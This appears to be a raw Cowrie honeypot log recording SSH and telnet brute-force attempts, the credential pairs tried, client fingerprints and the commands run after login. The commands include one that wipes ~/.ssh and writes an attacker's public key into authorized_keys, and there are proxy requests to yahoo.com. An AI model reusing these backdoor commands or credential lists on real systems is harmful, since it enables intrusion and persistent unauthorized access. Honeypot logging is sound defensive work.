{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:38:26.025365Z","src_ip":"212.227.235.229","session":"0a7c983dd669"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:38:26.027914Z","src_ip":"212.227.235.229","session":"0a7c983dd669"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41548,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ee9e1cbab4e","protocol":"ssh","message":"New connection: 212.227.235.229:41548 (1.2.3.4:22) [session: 1ee9e1cbab4e]","sensor":"my-vps","timestamp":"2025-08-26T04:38:35.469154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:38:35.470307Z","src_ip":"212.227.235.229","session":"1ee9e1cbab4e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:38:35.746163Z","src_ip":"212.227.235.229","session":"1ee9e1cbab4e"}
{"eventid":"cowrie.login.failed","username":"dmdba","password":"123","message":"login attempt [dmdba/123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:38:36.855125Z","src_ip":"212.227.235.229","session":"1ee9e1cbab4e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:38:38.134878Z","src_ip":"212.227.235.229","session":"1ee9e1cbab4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59236,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1fca7b6d8bd","protocol":"ssh","message":"New connection: 212.227.235.229:59236 (1.2.3.4:22) [session: f1fca7b6d8bd]","sensor":"my-vps","timestamp":"2025-08-26T04:38:41.543366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:38:42.138398Z","src_ip":"212.227.235.229","session":"f1fca7b6d8bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T04:38:42.140104Z","src_ip":"212.227.235.229","session":"f1fca7b6d8bd"}
{"eventid":"cowrie.login.success","username":"root","password":"Kishore@123","message":"login attempt [root/Kishore@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:38:45.558692Z","src_ip":"212.227.235.229","session":"f1fca7b6d8bd"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:38:46.209003Z","src_ip":"212.227.235.229","session":"f1fca7b6d8bd"}
{"eventid":"cowrie.session.closed","duration":31.45648765563965,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:38:49.119979Z","src_ip":"212.227.125.160","session":"1263a4932e08"}
{"eventid":"cowrie.session.connect","src_ip":"222.101.201.220","src_port":34970,"dst_ip":"1.2.3.4","dst_port":23,"session":"6482e8140b2f","protocol":"telnet","message":"New connection: 222.101.201.220:34970 (1.2.3.4:23) [session: 6482e8140b2f]","sensor":"my-vps","timestamp":"2025-08-26T04:38:50.680490Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41828,"dst_ip":"1.2.3.4","dst_port":22,"session":"493e1f94edeb","protocol":"ssh","message":"New connection: 212.227.235.229:41828 (1.2.3.4:22) [session: 493e1f94edeb]","sensor":"my-vps","timestamp":"2025-08-26T04:39:19.064846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:39:19.065815Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:39:19.140223Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.login.success","username":"root","password":"xiaoxue123","message":"login attempt [root/xiaoxue123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:39:19.481183Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:39:19.711849Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:39:19.712512Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:39:19.713549Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:19.789272Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:39:19.954267Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:39:19.955008Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:39:20.031295Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:20.032095Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41830,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b48ece53656","protocol":"ssh","message":"New connection: 212.227.235.229:41830 (1.2.3.4:22) [session: 5b48ece53656]","sensor":"my-vps","timestamp":"2025-08-26T04:39:20.103941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:39:20.104898Z","src_ip":"212.227.235.229","session":"5b48ece53656"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:39:20.177002Z","src_ip":"212.227.235.229","session":"5b48ece53656"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:39:20.507637Z","src_ip":"212.227.235.229","session":"5b48ece53656"}
{"eventid":"cowrie.session.closed","duration":30.425488471984863,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:21.105909Z","src_ip":"222.101.201.220","session":"6482e8140b2f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:21.581778Z","src_ip":"212.227.235.229","session":"5b48ece53656"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41840,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e8103b56c57","protocol":"ssh","message":"New connection: 212.227.235.229:41840 (1.2.3.4:22) [session: 0e8103b56c57]","sensor":"my-vps","timestamp":"2025-08-26T04:39:21.652991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:39:21.653648Z","src_ip":"212.227.235.229","session":"0e8103b56c57"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:39:21.725819Z","src_ip":"212.227.235.229","session":"0e8103b56c57"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:39:22.055092Z","src_ip":"212.227.235.229","session":"0e8103b56c57"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:22.128165Z","src_ip":"212.227.235.229","session":"493e1f94edeb"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:22.129220Z","src_ip":"212.227.235.229","session":"0e8103b56c57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40134,"dst_ip":"1.2.3.4","dst_port":22,"session":"6446be71b3e5","protocol":"ssh","message":"New connection: 212.227.235.229:40134 (1.2.3.4:22) [session: 6446be71b3e5]","sensor":"my-vps","timestamp":"2025-08-26T04:39:24.046937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:39:24.047714Z","src_ip":"212.227.235.229","session":"6446be71b3e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:39:24.316515Z","src_ip":"212.227.235.229","session":"6446be71b3e5"}
{"eventid":"cowrie.login.failed","username":"shiv","password":"shiv123","message":"login attempt [shiv/shiv123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:39:25.433207Z","src_ip":"212.227.235.229","session":"6446be71b3e5"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:39:26.704627Z","src_ip":"212.227.235.229","session":"6446be71b3e5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32547,"dst_ip":"1.2.3.4","dst_port":22,"session":"c68e53e49476","protocol":"ssh","message":"New connection: 213.209.150.239:32547 (1.2.3.4:22) [session: c68e53e49476]","sensor":"my-vps","timestamp":"2025-08-26T04:39:28.151398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:39:28.152048Z","src_ip":"213.209.150.239","session":"c68e53e49476"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T04:39:28.199299Z","src_ip":"213.209.150.239","session":"c68e53e49476"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:39:28.434169Z","src_ip":"213.209.150.239","session":"c68e53e49476"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":102,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:102","sensor":"my-vps","timestamp":"2025-08-26T04:39:28.482159Z","session":"c68e53e49476"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:39:28.529686Z","src_ip":"213.209.150.239","session":"c68e53e49476"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":14293,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14293","sensor":"my-vps","timestamp":"2025-08-26T04:39:28.665528Z","session":"c68e53e49476"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:39:28.712696Z","src_ip":"213.209.150.239","session":"c68e53e49476"}
